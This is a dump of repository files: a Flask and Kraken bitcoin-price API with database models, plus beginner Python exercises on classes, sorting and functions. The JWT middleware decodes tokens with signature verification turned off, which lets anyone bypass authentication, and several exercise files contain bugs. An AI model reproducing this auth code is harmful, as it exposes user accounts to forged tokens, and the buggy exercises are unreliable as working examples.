data[-1]['timestamp'] != last_warning_timestamp:\n\n if measured_diff > 0:\n log.info(f\"Active UP trading, diff = {measured_diff}, buy @ {data[-1]['c_price']} | {data[-1]['timestamp']}\")\n if measured_diff < 0:\n log.error(f\"Active DOWN trading, diff = {measured_diff} sell @ {data[-1]['c_price']} | {data[-1]['timestamp']}\")\n\n return data[-1][\"timestamp\"]\n" }, { "alpha_fraction": 0.6654040217399597, "alphanum_fraction": 0.6679292917251587, "avg_line_length": 26.34482765197754, "blob_id": "0657af2cec22f0b35e260a76d2f18d62c8cf9bd0", "content_id": "2a1afc66c166d75008c7d8fc4778f8a2432872f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 78, "num_lines": 29, "path": "/api/ohlc.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import krakenex\n\nfrom flask import Blueprint\nfrom decimal import Decimal\nfrom auth import LoginManager\nfrom db import db\nfrom db.models import Ohlc\nfrom log import log\nfrom setup import get_kraken_api\n\nohlc_bp = Blueprint(\"ohlc_bp\", __name__)\n\nlog.warning(\"Loading api.account\")\nlogin_manager = LoginManager()\n\napi = get_kraken_api()\n\n@ohlc_bp.route(\"ohlc/<int:ohlc_interval>\", methods=[\"GET\", \"POST\", \"OPTIONS\"])\ndef ohlc_data(ohlc_interval: int, limit: int = 50):\n log.debug(f\"Retrieving OHLC data ({ohlc_interval} minutes interval)\")\n data = [x.as_canvasjs_datapoints() for x in\n db.session()\n .query(Ohlc)\n .filter(Ohlc.interval == ohlc_interval)\n .order_by(Ohlc.endtime.desc())\n .limit(limit)\n ]\n print(data)\n return data" }, { "alpha_fraction": 0.5835411548614502, "alphanum_fraction": 0.5835411548614502, "avg_line_length": 16.434782028198242, "blob_id": "f16c30e541e7c225392e434f2d69fbc531796f46", "content_id": "2631c647bddb52508cab8c3b2bb737326d153e15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 56, "num_lines": 23, "path": "/errors.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from log import log\n\n\nclass APIError(object):\n\n def json_error(self):\n return {\n \"error\": self.msg\n }\n\n\nclass CredentialsError(APIError):\n\n def __init__(self, msg=\"Generic Credentials Error\"):\n log.error(msg)\n self.msg = msg\n\n\nclass GenericApiError(APIError):\n\n def __init__(self, msg=\"Generic API Error\"):\n log.error(msg)\n self.msg = msg\n" }, { "alpha_fraction": 0.5388396978378296, "alphanum_fraction": 0.5486725568771362, "avg_line_length": 26.486486434936523, "blob_id": "3ff88bf67cd1822b0b1c5e0b35dc231dfdc27def", "content_id": "b3e69b9c3f447eb4f7d0f897324a0dcc48a0dc7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": "/api/middleware.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import simplejson as json\n\nfrom functools import wraps\nfrom flask import g\nfrom jwt import decode, exceptions\nfrom flask import request\n\nfrom log import log\n\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n log.debug(\"Checking token\")\n authorization = request.headers.get(\"authorization\", None)\n if not authorization:\n return (\n json.dumps({\"error\": \"no authorization token provided\"}),\n 403,\n {\"Content-type\": \"application/json\"},\n )\n\n try:\n token = authorization.split(\" \")[1]\n resp = decode(token, None, verify=False, algorithms=[\"HS256\"])\n log.info(resp)\n g.user = resp[\"sub\"]\n except exceptions.DecodeError as e:\n return (\n json.dumps({\"error\": \"invalid authorization token\"}),\n 403,\n {\"Content-type\": \"application/json\"},\n )\n\n return f(*args, **kwargs)\n\n return wrap\n" }, { "alpha_fraction": 0.5212847590446472, "alphanum_fraction": 0.5373438596725464, "avg_line_length": 28.61132049560547, "blob_id": "5f98f3c0aef30e232e5be4515e9c4a3fcb9e77a4", "content_id": "843e44b93fad13f4a9f4efa943ca6a8060a2fbb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7858, "license_type": "no_license", "max_line_length": 93, "num_lines": 265, "path": "/kraken_websocket.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import datetime\nimport sys\n\nimport requests\nfrom kraken_wsclient_py import kraken_wsclient_py as kraken_client\nfrom sqlalchemy import and_, exists\nfrom sqlalchemy.orm import Session\n\nfrom log import log\nfrom db import db\nfrom db.models import Ticker, Ohlc\nfrom portfolio import Portfolio\n\nsubscriptions: dict = dict()\n\n\ndef kraken_rest_api_to_psql(interval=1, pair=\"XXBTZEUR\"):\n\n log.info(\n f\"Retrieving past data for {pair} with interval {interval} from kraken REST Api\"\n )\n\n url: str = f\"https://api.kraken.com/0/public/OHLC?pair={pair}&interval={interval}\"\n\n data: dict = dict()\n data[\"interval\"] = interval\n data[\"pair\"] = pair\n\n result: dict = requests.post(data=data, url=url).json()\n\n num_kraken_records: int = len(result[\"result\"][pair])\n\n log.info(f\"Got {num_kraken_records} records\")\n\n session: Session = db.session()\n c: int = 0\n for record in result[\"result\"][pair]:\n\n existing_record = session.query(\n exists().where(\n and_(\n Ohlc.begintime == record[0],\n Ohlc.interval == interval\n ))\n ).scalar()\n\n if not existing_record:\n\n r = Ohlc()\n r.interval = interval\n r.pair = \"XBT/EUR\"\n r.begintime = record[0]\n r.endtime = float(record[0]) + (interval * 60.0)\n r.open = record[1]\n r.high = record[2]\n r.low = record[3]\n r.close = record[4]\n r.vwap = record[5]\n r.count = record[6]\n\n try:\n db.session().add(r)\n db.session.commit()\n\n except Exception as e:\n db.session.rollback()\n log.warning(f\"Failure inserting record: {e}\")\n else:\n c += 1\n\n log.info(f\"{c} record(s) skipped, {num_kraken_records - c} record(s) added.\")\n log.info(\"Done.\")\n\n\ndef store2psql(data):\n \"\"\"\n Store data to the porstgresql database\n :param data: result from websocket\n :return:\n \"\"\"\n if type(data) is list:\n handler: callable = getattr(\n sys.modules[__name__],\n f\"handle_{subscriptions[data[0]]['meta']['name']}_data\",\n )\n handler(data, **{\"channelId\": data[0]})\n\n if type(data) is dict and data.get(\"event\", \"\") == \"systemStatus\":\n log.info(\"------------------------------------------------------\")\n log.info(f\"Connection ID = {data.get('connectionID')}\")\n log.info(f\"System Status = {data.get('status')}\")\n log.info(f\"System Version = {data.get('version')}\")\n log.info(\"------------------------------------------------------\")\n\n if type(data) is dict and data.get(\"event\", \"\") == \"subscriptionStatus\":\n log.info(f\"Channel ID = {data.get('channelID')}\")\n log.info(f\"Channel Name = {data.get('subscription').get('name')}\")\n log.info(f\"Subscription Pair = {data.get('pair')}\")\n log.info(f\"Subscription Status = {data.get('status')}\")\n if data.get(\"status\") == \"error\":\n log.error(f\"Error message = {data.get('errorMessage')}\")\n\n log.info(\"------------------------------------------------------\")\n\n subscriptions[data.get(\"channelID\")] = {\n \"meta\": data.get(\"subscription\"),\n \"pair\": data.get(\"pair\"),\n }\n\n if type(data) is dict and data.get(\"event\") == \"heartbeat\":\n print(\"\\u2665\", end=\"\")\n sys.stdout.flush()\n\n\ndef handle_ticker_data(data, **kwargs):\n\n record = Ticker()\n\n record.a_price = data[1][\"a\"][0]\n record.a_whole_lot_volume = data[1][\"a\"][1]\n record.a_lot_volume = data[1][\"a\"][2]\n\n record.b_price = data[1][\"b\"][0]\n record.b_whole_lot_volume = data[1][\"b\"][1]\n record.b_lot_volume = data[1][\"b\"][2]\n\n record.c_price = data[1][\"c\"][0]\n record.c_lot_volume = data[1][\"c\"][1]\n\n record.v_today = data[1][\"v\"][0]\n record.v_24_hours = data[1][\"v\"][1]\n\n record.p_today = data[1][\"p\"][0]\n record.p_24_hours = data[1][\"p\"][1]\n\n record.t_today = data[1][\"t\"][0]\n record.t_24_hours = data[1][\"t\"][1]\n\n record.l_today = data[1][\"l\"][0]\n record.l_24_hours = data[1][\"l\"][1]\n\n record.o_today = data[1][\"o\"][0]\n record.o_24_hours = data[1][\"o\"][1]\n\n record.pair = data[3]\n\n record.timestamp = datetime.datetime.now().timestamp()\n try:\n db.session().add(record)\n db.session().commit()\n print(\"⇩\", end=\"\")\n sys.stdout.flush()\n except Exception as e:\n db.session.rollback()\n log.error(f\"Could not insert ticker data: {str(e)}\")\n\n\n\ndef handle_ohlc_data(data, **kwargs):\n\n # The Ohlc socket feeds us with updates of the given\n # interval. If the windows is new, there is no record\n # with an identical endtime, so we should insert.\n # If there is a record with identical endtime, we should\n # update the record, and we discard the trades of that\n # window-interval (1m, 5m, 30m, 60m, ...)\n\n def getExistingOhlcEntry(pair, endtime, interval):\n return (\n db.session()\n .query(Ohlc)\n .filter(\n and_(\n Ohlc.pair == pair,\n Ohlc.endtime == endtime,\n Ohlc.interval == interval,\n )\n )\n .order_by(Ohlc.time.desc())\n .first()\n )\n\n interval = int(subscriptions[kwargs[\"channelId\"]][\"meta\"][\"interval\"])\n pair = subscriptions[kwargs[\"channelId\"]][\"pair\"]\n\n record = getExistingOhlcEntry(pair, data[1][1], interval)\n\n try:\n if record:\n record.time = data[1][0]\n record.begintime = float(data[1][1]) - (interval * 60.0)\n record.endtime = data[1][1]\n record.open = data[1][2]\n record.high = data[1][3]\n record.low = data[1][4]\n record.close = data[1][5]\n record.vwap = data[1][6]\n record.volume = data[1][7]\n record.count = data[1][8]\n\n print(\"↺\", end=\"\")\n sys.stdout.flush()\n\n else:\n\n record = Ohlc()\n record.pair = data[3]\n record.interval = interval\n record.pair = pair\n record.time = data[1][0]\n record.endtime = data[1][1]\n record.open = data[1][2]\n record.high = data[1][3]\n record.low = data[1][4]\n record.close = data[1][5]\n record.vwap = data[1][6]\n record.volume = data[1][7]\n record.count = data[1][8]\n\n print(\"⇩\", end=\"\")\n sys.stdout.flush()\n\n db.session().add(record)\n\n db.session().commit()\n\n except Exception as e:\n db.session.rollback()\n print(f\"Failure adding/updating ohcl: {e}\")\n\n\ndef run_ohlc_websocket(interval: int=0, pair: str= \"XBT/EUR\"):\n\n if interval == 0:\n log.warning(\"No interval window given, using 1 minute\")\n interval = 1\n\n kraken_rest_api_to_psql(interval=interval)\n\n log.info(f\"Setting up OHLC websocket\")\n client = kraken_client.WssClient()\n\n client.subscribe_public(\n subscription={\"name\": \"ohlc\", \"interval\": interval}, pair=[pair], callback=store2psql\n )\n\n log.info(\"⇩ = Insert new OHLC record for this interval window.\")\n log.info(\"↺ = Update existing record for this interval window.\")\n log.info(\"♥ = Websocket heartbeat.\")\n\n log.info(\"Starting websocket client\")\n\n client.start()\n\ndef run_ticker_websocket(portfolio: Portfolio):\n\n log.info(f\"Setting up Ticker websocket for {portfolio.pairs}\")\n\n client = kraken_client.WssClient()\n client.subscribe_public(\n subscription={\"name\": \"ticker\"}, pair=portfolio.pairs, callback=store2psql\n )\n\n log.info(\"Starting Ticker websocket\")\n client.start()" }, { "alpha_fraction": 0.5402550101280212, "alphanum_fraction": 0.5774134993553162, "avg_line_length": 23.7297306060791, "blob_id": "925b37ec94da2258d69916ed56164925437628b4", "content_id": "4907439fc90b2aa9d0c16405390f36eef7fc3e5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2745, "license_type": "no_license", "max_line_length": 78, "num_lines": 111, "path": "/db/models.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from sqlalchemy import *\nfrom sqlalchemy.orm import relationship\n\nfrom db import db\n\n\nclass Ticker(db.Model):\n\n __tablename__ = \"ticker\"\n __table_args__ = (\n Index('timestamp_idx', 'timestamp', unique=False),\n )\n\n id = Column(Integer, primary_key=True)\n\n pair = Column(CHAR(7))\n\n a_price = Column(Numeric(18, 5))\n a_whole_lot_volume = Column(Numeric(18, 8))\n a_lot_volume = Column(Numeric(18, 8))\n\n b_price = Column(Numeric(18, 5))\n b_whole_lot_volume = Column(Numeric(18, 8))\n b_lot_volume = Column(Numeric(18, 8))\n\n c_price = Column(Numeric(18, 5))\n c_lot_volume = Column(Numeric(18, 8))\n\n v_today = Column(Numeric(18, 8))\n v_24_hours = Column(Numeric(18, 8))\n\n p_today = Column(Numeric(18, 5))\n p_24_hours = Column(Numeric(18, 5))\n\n t_today = Column(Integer)\n t_24_hours = Column(Integer)\n\n l_today = Column(Numeric(18, 5))\n l_24_hours = Column(Numeric(18, 5))\n\n h_today = Column(Numeric(18, 5))\n h_24_hours = Column(Numeric(18, 5))\n\n o_today = Column(Numeric(18, 5))\n o_24_hours = Column(Numeric(18, 5))\n\n timestamp = Column(Numeric(18, 5))\n\n\nclass Ohlc(db.Model):\n\n __tablename__ = \"ohlc\"\n __table_args__ = (\n Index(\"idx_interval_endtime\", \"interval\", \"begintime\", unique=True),\n )\n\n def as_dict(self):\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n\n def as_canvasjs_datapoints(self):\n return {\n \"x\": self.endtime * 1000,\n \"y\": [\n self.open,\n self.high,\n self.low,\n self.close\n ]\n }\n\n id = Column(Integer, primary_key=True)\n pair = Column(CHAR(7))\n interval = Column(Integer())\n time = Column(Numeric(18, 4))\n begintime = Column(Numeric(18, 4))\n endtime = Column(Numeric(18, 4))\n open = Column(Numeric(18, 8))\n high = Column(Numeric(18, 8))\n low = Column(Numeric(18, 8))\n close = Column(Numeric(18, 8))\n vwap = Column(Numeric(18, 8))\n count = Column(Numeric(18, 8))\n\n\nclass Users(db.Model):\n __tablename__ = \"users\"\n __table_args__ = (\n Index(\"idx_name\", \"name\"),\n )\n\n id = Column(Integer, primary_key=True)\n name = Column(Text, unique=True)\n password = Column(Text)\n\n\nclass Tokens(db.Model):\n\n __tablename__ = \"tokens\"\n __table_args__ = (\n Index(\"idx_token\", \"token\"),\n )\n\n id = Column(Integer(), primary_key=True)\n token = Column(Text(), unique=True)\n user_id = Column(Integer(), ForeignKey(\"users.id\"))\n timestamp = Column(DateTime())\n ttl_max = Column(DateTime())\n ttl_increment = Column(Integer())\n last_ip_address = Column(Text())\n\n user = relationship(\"Users\", foreign_keys=[user_id])\n" } ]
17
robinsonium/python
https://github.com/robinsonium/python
77cb05e7a41ed5cda075dc68dd1d5edd98e55e9d
665ba466b4d4f8e8b7e8e497745951d58876fa9e
4d3ef74f22131ea3820c8bdb0d18ec72ae77dd1f
refs/heads/master
2022-12-08T05:27:22.342661
2020-08-26T03:19:33
2020-08-26T03:19:33
285,420,893
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6369942426681519, "alphanum_fraction": 0.6606936454772949, "avg_line_length": 39.1860466003418, "blob_id": "14e83b19f528000d47da55167d1bf4294ee08742", "content_id": "ad32ca0769d801ecac7b9bf9a1fa84b74a7f8672", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1730, "license_type": "no_license", "max_line_length": 102, "num_lines": 43, "path": "/oop/user2.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "from bank_account import BankAccount\n\nclass User:\n def __init__(self,username,email_address):\n self.name=username\n self.email=email_address\n self.account=[]\n def create_account(self,int_rate,balance,account_name):\n self.account.append(BankAccount(int_rate,balance,account_name))\n return(self)\n def make_deposit(self,amount,account_name):\n if len(self.account.account_name)==0:\n print(f\"Error, {self.name} has no account created\")\n else:\n self.account.account_name.balance+=amount\n return(self)\n def make_withdrawal(self,amount):\n if not self.account:\n print(f\"Error, {self.name} has no account created\")\n else:\n self.account.balance-=amount\n return(self)\n def display_user_balance(self):\n if not self.account:\n print(f\"Error, {self.name} has no account created\")\n else:\n print(self.account,\":\",self.account.balance)\n def transfer_money(self,other_user,amount):\n other_user.make_deposit(amount)\n self.account.balance-=amount\n return(self)\n\nbrian=User(\"brian\",\"brian@dojo.com\")\njess=User(\"Jessica\",\"Jess@dojo.com\")\nrae=User(\"Raelynn\",\"rae@dojo.com\")\n# brian.create_account(1.04,200,\"checking\")\n\nbrian.make_deposit(150).make_deposit(200).make_deposit(50).make_withdrawal(200).display_user_balance()\n# jess.make_deposit(75).make_deposit(425).make_deposit(50).make_withdrawal(50).display_user_balance()\n# rae.make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(50).display_user_balance()\n# brian.transfer_money(rae,150).display_user_balance()\n# brian.account.yield_interest().display_account_info()\n# rae.display_user_balance()\n\n " }, { "alpha_fraction": 0.6067415475845337, "alphanum_fraction": 0.670412003993988, "avg_line_length": 37.21428680419922, "blob_id": "7036fdb249e705387948184826360aa09156e8a5", "content_id": "4975ac6aeced5993eb4a601ce38e4ee0caf6280f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 82, "num_lines": 14, "path": "/python_fundamentals/intermediate1.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "import random\ndef randInt(min=0, max= 100):\n if min !=0:\n max=max-min #\n num=random.random()*max+min\n elif max != 100:\n num=random.random()*max\n else:\n num = random.random()*max+min\n return round(num)\nprint(randInt()) # should print a random integer between 0 to 100 \nprint(randInt(max=50)) # should print a random integer between 0 to 50\nprint(randInt(min=50)) # should print a random integer between 50 to 100\nprint(randInt(min=50, max=500)) # should print a random integer between 50 and 500" }, { "alpha_fraction": 0.6443965435028076, "alphanum_fraction": 0.6465517282485962, "avg_line_length": 22.25, "blob_id": "db0287e8ef203a345567168e7dca4ee11d9540c4", "content_id": "68e6ef6835ea4b5b028befdf0153fe0003a8a14c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 464, "license_type": "no_license", "max_line_length": 114, "num_lines": 20, "path": "/oop/modularizing/parent.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "local_val=\"magical unicorns\"\ndef square(x):\n return x*x\n\nclass User:\n def __init__(self,name):\n self.name=name\n def say_hello(self):\n return(\"hello\")\n\nprint(square(5))\nuser=User(\"Anna\")\nprint(user.name)\nprint(user.say_hello())\n\nprint(__name__)\nif __name__ == \"__main__\":\n print(\"this file is being executed directly\")\nelse:\n print(\"This file is being executed because it is being imported by another file. the file is called\",__name__)" }, { "alpha_fraction": 0.5986159443855286, "alphanum_fraction": 0.6173010468482971, "avg_line_length": 26.283018112182617, "blob_id": "86db67b2c47805a6990135a395dfb8c0683b7a79", "content_id": "0a554710cdacfd95b6cc9bce8476b358e51e1268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1445, "license_type": "no_license", "max_line_length": 98, "num_lines": 53, "path": "/python_fundamentals/number_players.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "import random\n# Each player object must include a name, score, and guess\n# 1) create a list of objects\nplayers = [\n {'name': \"Natalie\",\n 'score': 0,\n 'guess': 9},\n {'name': \"Pat\",\n 'score': 0,\n 'guess': 8},\n {'name': \"Dan\",\n 'score': 0,\n 'guess': 5},\n {'name': \"Adrian\",\n 'score': 0,\n 'guess': 7},\n {'name': \"Odion\",\n 'score': 0,\n 'guess': 2},\n]\n\n# write a function that, given a list of player objects, returns the player with the highest score\n# a random number between 1 and 10 is generated\n# numbers greater than random number gain 10 points\n# numbers less than random number gain 5 points\n# numbers equal to random number gain 15 points\n\n## Pseduocode\n# declare a function and accept player list as paramater\n\n# Then, generate a random number\nrnd=round(random.random()*10)\nprint(\"our random number is\",rnd)\n# Next, a for loop should compare each guess to the rnd number and assign a score\ndef scoreit(list):\n highscorer=[]\n maxscore=0\n for player in list:\n if player['guess']>rnd:\n player['score']+=10\n elif player['guess']<rnd:\n player['score']+=5\n else:\n player['score']+=15\n if player['score']>maxscore:\n maxscore=player['score']\n highscorer=player['name']\n for player in list:\n print(player)\n print(\"And now, the final results:\")\n return(highscorer,maxscore)\n\nprint(scoreit(players))" }, { "alpha_fraction": 0.5177304744720459, "alphanum_fraction": 0.5992907881736755, "avg_line_length": 25.85714340209961, "blob_id": "8acd6a54bc8fd338d5907a902e15438fe37bbfab", "content_id": "6fcb83d7906c0420454911d5b52c2c6153aa4d9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 68, "num_lines": 21, "path": "/python_fundamentals/selectionsort.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "arr=[55,69,9,102,4,4,3,99,-1024,256,23,-23,-22,511,200,103,75,-1,-2]\n\ndef selectionsort(arr):\n#start at arr[0]\n#find the minimum of elements arr[1] through arr[last]\n#swap min with arr[0]\n#start at arr[1]\n#find the min in the remaining elements\n#swap min with arr[1]\n#...n\n last=len(arr)\n min=arr[0]\n for i in range(len(arr)):\n for k in range(i+1,last):\n if arr[k]<arr[i]: #find min of the remaining elements\n min=k\n temp=arr[i]\n arr[i]=arr[min]\n arr[k]=temp\n return(arr)\nprint(selectionsort(arr))\n" }, { "alpha_fraction": 0.6569536328315735, "alphanum_fraction": 0.7026489973068237, "avg_line_length": 33.272727966308594, "blob_id": "51dcabe450027e44c8bc9297a13ff2dbfbb8fc51", "content_id": "7f195abc5456016b88351060f0ee79bfa5049bb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 102, "num_lines": 44, "path": "/oop/user.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "class User:\n def __init__(self,username,email_address):\n self.name=username\n self.email=email_address\n self.account_balance=0\n def make_deposit(self,amount):\n self.account_balance+=amount\n return(self)\n def make_withdrawal(self,amount):\n self.account_balance-=amount\n return(self)\n def display_user_balance(self):\n print(self.name,\":\",self.account_balance)\n def transfer_money(self,other_user,amount):\n other_user.make_deposit(amount)\n self.account_balance-=amount\n return(self)\n\n\nbrian=User(\"brian\",\"brian@dojo.com\")\njess=User(\"Jessica\",\"Jess@dojo.com\")\nrae=User(\"Raelynn\",\"rae@dojo.com\")\n# brian.make_deposit(150)\n# brian.make_deposit(200)\n# brian.make_deposit(50)\n# brian.make_withdrawal(200)\n# brian.display_user_balance()\n# jess.make_deposit(75)\n# jess.make_deposit(425)\n# jess.make_withdrawal(50)\n# jess.make_withdrawal(50)\n# jess.display_user_balance()\n# rae.make_deposit(100)\n# rae.make_deposit(200)\n# rae.make_deposit(300)\n# rae.make_withdrawal(50)\n# rae.display_user_balance()\n# brian.transfer_money(rae,150)\nbrian.make_deposit(150).make_deposit(200).make_deposit(50).make_withdrawal(200).display_user_balance()\njess.make_deposit(75).make_deposit(425).make_deposit(50).make_withdrawal(50).display_user_balance()\nrae.make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(50).display_user_balance()\nbrian.transfer_money(rae,150).display_user_balance()\n# brian.display_user_balance()\nrae.display_user_balance()\n\n " }, { "alpha_fraction": 0.5679442286491394, "alphanum_fraction": 0.5988053679466248, "avg_line_length": 31.419355392456055, "blob_id": "faa1aa23372fba59a70def3515c53e8a3050cedc", "content_id": "85762ea0319617a77e6856d513a34cf91157229c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2009, "license_type": "no_license", "max_line_length": 102, "num_lines": 62, "path": "/oop/car.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "import unittest\n\nclass Car:\n def __init__(self, make, model, year):\n \"\"\" initialize attributes to make a car\"\"\"\n self.make = make\n self.model = model\n self.year = year\n self.odomoter_reading = 0\n \n def get_descriptive_name(self):\n \"\"\" return a nicely formatted long name\"\"\"\n long_name=f\"{self.year} {self.make} {self.model}\"\n # use .title() to capitalize leading char\n return long_name.title()\n\n def set_odometer(self,mileage):\n \"\"\"\n Update odomoter value\n If mileage < current value, error\n \"\"\"\n if mileage >= self.odomoter_reading:\n self.odomoter_reading=mileage\n return self\n else:\n print(\"You can't roll back the odomoter!!\")\n return False\n \n def get_odometer(self):\n return(self.odomoter_reading)\n \n def add_miles(self,miles):\n \"\"\" increment current odomoter value by 'miles' \"\"\"\n self.odomoter_reading += miles\n return(self)\n\n \n\n# my_car=Car('chevy','luv',1980)\n# my_car.set_odometer(150).add_miles(25)\n# print(f\"My car is a {my_car.get_descriptive_name()} and it has {my_car.get_odometer()} miles on it\")\n# my_car.add_miles(50)\n# print(f\"Now my car has {my_car.get_odometer()} miles\")\nclass TestCar(unittest.TestCase):\n \"\"\"Tests for the Car class\"\"\"\n def test_set_odometer(self):\n my_car=Car('chevy','luv',1980)\n my_car.set_odometer(-100)\n self.assertFalse(my_car.get_odometer())\n my_car.set_odometer(2468)\n self.assertEqual(my_car.get_odometer(),2468)\n def test_descriptive_name(self):\n my_car=Car('chevy','luv',1980)\n self.assertEqual(my_car.get_descriptive_name(),'1980 Chevy Luv')\n def test_add_miles(self):\n my_car=Car('Nissan','Titan',2016)\n my_car.add_miles(1200).add_miles(2000).add_miles(10000)# should be 13200\n self.assertEqual(my_car.get_odometer(),13200)\n\n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.43169400095939636, "alphanum_fraction": 0.5173041820526123, "avg_line_length": 26.5, "blob_id": "f862f86c6b443dbc7976cd971ac69d2e3fb5bb98", "content_id": "8bc5c5ac2c7462fce8b3831af69457f25955e786", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 68, "num_lines": 20, "path": "/python_fundamentals/bubblesort.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "arr=[55,69,9,102,4,4,3,99,-1024,256,23,-23,-22,511,200,103,75,-1,-2]\n\ndef bubblesort(arr):\n count=len(arr)\n swaps=0\n while count>=0:\n for i in range(len(arr)-1):\n first=arr[i]\n second=arr[i+1]\n print(f\"comparing {first} and {second}\")\n if first>second:\n arr[i],arr[i+1] = arr[i+1],arr[i]\n print(f\"swapping {first} and {second}\")\n swaps+=1\n count=count-1\n print(f\"Made {swaps} swaps\")\n return arr\n\n# test case\nprint(bubblesort(arr))" }, { "alpha_fraction": 0.4871794879436493, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 8.75, "blob_id": "a5afbdadb281b085e8c0e9a149b848b9983c7530", "content_id": "e556de403f466741710a260e4cc70ca5265abfd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/python_fundamentals/test.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "\nfoo()\n\ndef foo():\n print(\"I'm foo\")" }, { "alpha_fraction": 0.6388888955116272, "alphanum_fraction": 0.644444465637207, "avg_line_length": 24.571428298950195, "blob_id": "0b8b4865742130b5a9d1bd0829d76d208e81658e", "content_id": "9985161588d3cca4727a0e1cec2ead8f7518e4af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 180, "license_type": "no_license", "max_line_length": 59, "num_lines": 7, "path": "/oop/hackerrank/practice.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "# simple array sum\n# Given an array of integers, find the sum of its elements.\ndef sumArray(arr):\n total=0\n for i in range(len(arr)):\n total+=arr[i]\n return total\n\n" }, { "alpha_fraction": 0.6726352572441101, "alphanum_fraction": 0.7100039124488831, "avg_line_length": 39.74603271484375, "blob_id": "52e8cfdb46cab328e3e3ad53de2ca1f44633f368", "content_id": "ffcef3a7a88e87687b443947454010b8a30c416a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2569, "license_type": "no_license", "max_line_length": 305, "num_lines": 63, "path": "/python_fundamentals/basic_functions2.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "#Countdown - Create a function that accepts a number as an input. Return a new list that counts down by one, from the number (as the 0th element) down to 0 (as the last element).\n#Example: countdown(5) should return [5,4,3,2,1,0]\ndef countdown(num):\n mylist=[]\n for i in range(num,-1,-1):\n mylist.append(i)\n return(mylist)\nfoo=countdown(9)\nprint(foo)\n\n#version 2\ndef countdown2(num):\n mylist=list(range(num,-1,-1))\n return(mylist)\nbar=countdown2(20)\nprint(bar)\n\n#Print and Return - Create a function that will receive a list with two numbers. Print the first value and return the second.\n#Example: print_and_return([1,2]) should print 1 and return 2\ndef print_and_return(mylist):\n print(mylist[0])\n return(mylist[1])\n#test\nx=print_and_return([1,2])\nprint(\"x=\",x)\n\n#First Plus Length - Create a function that accepts a list and returns the sum of the first value in the list plus the list's length.\n#Example: first_plus_length([1,2,3,4,5]) should return 6 (first value: 1 + length: 5)\ndef first_plus_length(mylist):\n length=len(mylist)\n return(length+mylist[0]) \n#test case, should output '11'\nprint(first_plus_length([6,10,23,1,17]))\nprint(\"Done with first_plus_length\")\n#Values Greater than Second - Write a function that accepts a list and creates a new list containing only the values from the original list that are greater than its 2nd value. Print how many values this is and then return the new list. If the list has less than 2 elements, have the function return False\n#Example: values_greater_than_second([5,2,3,2,1,4]) should print 3 and return [5,3,4]\n#Example: values_greater_than_second([3]) should return False\ndef greater_than_second(mylist):\n newlist=[]\n second=mylist[1]\n count=0\n for i in range(0,len(mylist)-1):\n if mylist[i]>second:\n newlist.append(mylist[i])\n count+=1\n print(count)\n return(newlist)\n#test case\nfoo=greater_than_second([2,16,4,2,99,107,25,15])\nprint(foo)\nprint(\"done with greater_than_second\")\n\n#This Length, That Value - Write a function that accepts two integers as parameters: size and value. The function should create and return a list whose length is equal to the given size, and whose values are all the given value.\n#Example: length_and_value(4,7) should return [7,7,7,7]\n#Example: length_and_value(6,2) should return [2,2,2,2,2,2]\ndef this_length_that_value(size,value):\n newlist=[]\n for value in size:\n newlist.append(value)\n return(newlist)\n#test case\nprint(this_length_that_value(4,7))\nprint(this_length_that_value(6,2))\n\n\n" }, { "alpha_fraction": 0.5964391827583313, "alphanum_fraction": 0.6439169049263, 